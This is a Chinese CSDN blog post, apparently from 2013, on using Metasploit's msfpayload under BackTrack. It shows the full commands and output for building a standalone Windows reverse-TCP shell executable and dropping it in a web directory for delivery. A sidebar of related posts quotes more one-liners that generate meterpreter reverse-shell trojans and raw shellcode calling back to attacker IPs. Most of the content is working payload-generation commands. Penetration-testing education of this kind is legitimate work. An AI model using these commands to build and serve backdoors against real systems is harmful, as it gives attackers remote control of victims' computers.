metasploit的msfpayload创建可独立运行的二进制文件

最新推荐文章于 2024-06-05 17:44:32 发布
最新推荐文章于 2024-06-05 17:44:32 发布
阅读量3.7k 收藏
点赞数
分类专栏: backtrack metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/8865201
版权 
root@bt:~# msfpayload windows/shell_reverse_tcp O

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
    Version: 14774
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell


root@bt:~#


输入的命令,不是数字0,而是字母O,大写的O。

上面的命令是显示攻击载荷生成器有哪些选项。


然后生成exe文件:


root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 X > /var/www/payload1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 314
Options: {"LHOST"=>"192.168.1.11", "LPORT"=>"31337"}
root@bt:~# ll /var/www/
total 77
drwxr-xr-x  3 root root    60 2013-04-28 03:52 ./
drwxr-xr-x 20 root root   120 2011-06-08 09:16 ../
-rw-r--r--  1 root root   177 2011-05-10 03:45 index.html
-rw-r--r--  1 root root 73802 2013-04-28 03:52 payload1.exe
drwxr-xr-x  2 root root   465 2011-05-10 03:44 wstool/
root@bt:~# file /var/www/payload1.exe 
/var/www/payload1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:~#


feier7501
关注
专栏目录
metasploit学习之路(三) exploit+payload攻击载荷+metepreter(介绍)
Sea_Sand息禅
07-07 2317
一、exploit介绍 exploit是利用漏洞对目标进行攻击的模块,通过信息的手机及漏洞的验证等,使用相应的exploit对目标机进行漏洞攻击。也就是我么常说的漏洞利用exp。 exploit可有主动和被动两种。 主动:利用合适的exploit对目标机进行攻击 被动:类似于钓鱼,等待用户对我们的诱饵链接等进行操作我们才能攻击成功。 二、payload介绍 payloadmsf生成的有效载荷,可...
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4568
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
BT5 msf msfpayload生成2进制 msf生成exe meterpreter监听
weixin_30708329的博客
10-15 126
BT5 msf msfpayload生成2进制 msf生成exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.85.147 LPORT=4444 X >/root/Desktop/mt.exe其它脚本msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPOR...
msf-Windows payload
zzzzzyx_的博客
05-23 351
msfconsole 启动metasploit 然后 windows系统 msfvenom -p windows/meterpreter/reverse_tcp LHOST= _你的IP地址_ LPORT= _你的木马的IP地址_ -f exe > muma.exe 就这么一个不算文章的烂文章 您们也就不要赏钱了 下面????????的是坑钱的 其实我是一个 12 岁的 球娃 ...
msf--基于msiexe+txt的载荷执行
gclome的博客
07-22 404
0x00设备: 两台虚拟机 一台kali(ip为122.122.10.122)生成载荷 一台windows主机(目标机器) kali端 第一阶段 1.ifcongfig 查看本机ip 2.打开msfmsfconsole 3.做一个服务器,处理人家反弹过来的东西,可以放在阿里云主机上use expoit/multi/handler 4.利用一个载荷set payload windows/meterp...
metersphere 上传和下载接口上传文件参数化及下载文件校验
最新发布
mmy的博客
06-05 909
整体思路:首先编写下载用例(使用浏览器下载的请求url),配置后置操作将下载文件输出到指定文件中,配置脚本断言规则,读取下载文件内容然后进行校验。测试上传类型接口时,有时需要从前置用例中获取文件中的内容参数写入文件中后再进行上传接口调用,也就是说我想要随时改变上传文件的内容。对于一些下载接口需要对下载的文件内容做校验,如何模拟浏览器下载操作获得下载文件及内容呢。通过前置操作获取到上传的文件,然后修改文件内的内容,从而实现动态改变文件内容的目的。其中file_name是需要保存的文件路径,可自定义。
msf生成raw
SHELLCODE_8BIT的博客
12-13 1195
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.250.1 LPORT=5555 -f raw -o msf.bin
安全笔记:渗透|MetasploitMSF终端——基础使用(未完全修改)
吾本一无所有,何患徒壁之忧.
05-19 1273
目录 基础 使用指南 接口 功能程序 基础功能 载荷配置 攻击方式 msfvenom 附属功能 数据库 nexpose nessus 自建脚本 常用模块介绍 情报搜集——扫描模块 渗透攻击 后渗透攻击(Meterpreter) 免杀技术 相关知识 基础 使用指南 情报搜集:通常使用信息探测等方式获取目标主机的信息,信息探测分为主动信息探测和被动信息探测,...
Metasploit深入解析:基于模块的Payload及其定制
# 1. Metasploit简介和基本概念 ## 1.1 Metasploit框架概述 Metasploit是一个开源的渗透测试框架,广泛...- 有效载荷(Payload):用于在被攻击的系统上运行的恶意代码,可以执行各种操作和攻击。 - 辅助模块(Auxili
Metasploit 整理笔记
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
metasploit进阶3
mingyqf的博客
02-28 222
参考:https://longwaer.blog.csdn.net/article/details/122751394 域信息收集 常用信息收集模块 auxiliary/scanner/discovery/arp_sweep #基于arp协议发现内网存活主机,这不能通过代理使用 auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口 auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描,默认扫描1-10
生成msf常用payload
hl1293348082的专栏
04-07 2657
msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 正在上传…重新上传取消 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows ms
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
m0_61506558的博客
09-01 4999
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。meterpreter中输入:run post/windows/gather/enum_logged_on_users。...
MSF使用教程
huangyongkang666的博客
03-26 9915
MSF使用教程 1.简介 ​ Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 2.MSF模块介绍 1.辅助模块 auxiliary 负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能 2.渗透攻击模块exploits 利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动) ​ 主动渗透攻击:发送网络数据,触发安全漏洞。比如web应用程序渗透攻击、SCADA工业控制系
MSF-Shellcode生成和使用
weixin_34301307的博客
11-12 4751
1使用环境 Kali 2.0 msfvenom 2Msfvenom参数说明 msfvenom –h 查看帮助 说明: Options: -p, --payload <payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&...
Metasploit(msf)系列-木马生成
热门推荐
chaojixiaojingang
09-28 3万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 msfvenom命令行选项如下: Options:     -p, --payload    &lt;payload&gt;       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&amp;#039;-&amp;#039;或者s...
Unknown command:crawl 报错 在vscode中的处理办法
weixin_44520259的博客
03-15 1万+
问题描述 我的scrapy项目在cmd可以正确运行,但是在我编写好的用于运行的main.py文件运行却会报错,报错内容是“unknown command crawl”。 排除的原因:main.py文件位置错误,scrapy.cfg文件位置错误或缺失或内容错误,爬虫文件位置错误。 经过搜索与尝试,最终在一位博主的启发下确认了我的问题:vscode工作目录和scrapy.cfg所在目录不一致。我的v...
msf攻击载荷生成器
我还在的博客
10-06 1707
msf攻击载荷生成器0x00 前言0x01 拓扑结构0x02 过程1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程 0x00 前言 这是我对 msf攻击载荷生成器的学习记录。 0x01 拓扑结构 0x02 过程 1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成器生成木马过程 1.1 显示msfpayload命令的使用方法:msfp...
msf常用命令
黑锤的博客
07-14 2078
msfvenom:生成payload工具 常用参数:-l查看列表 -p 指定payload -f指定输出格式 -e指定一个编码方式 -i 指定编码次数 例如生成一个反向tcp的payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -e x86/shikata_ga_nai -I 5 -f exe > 1.exe 上面是生成Windows可执行文件,也可以生成Li...
Shellcode转二进制文件实用工具介绍
- 在安全研究中,二进制文件可以用于创建恶意软件或病毒,因此具有较高的安全风险。 6. **安全风险与防范措施**: - Shellcode的使用常常与安全漏洞的利用紧密相关,因此具有潜在的安全风险。 - 在使用shellcode...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值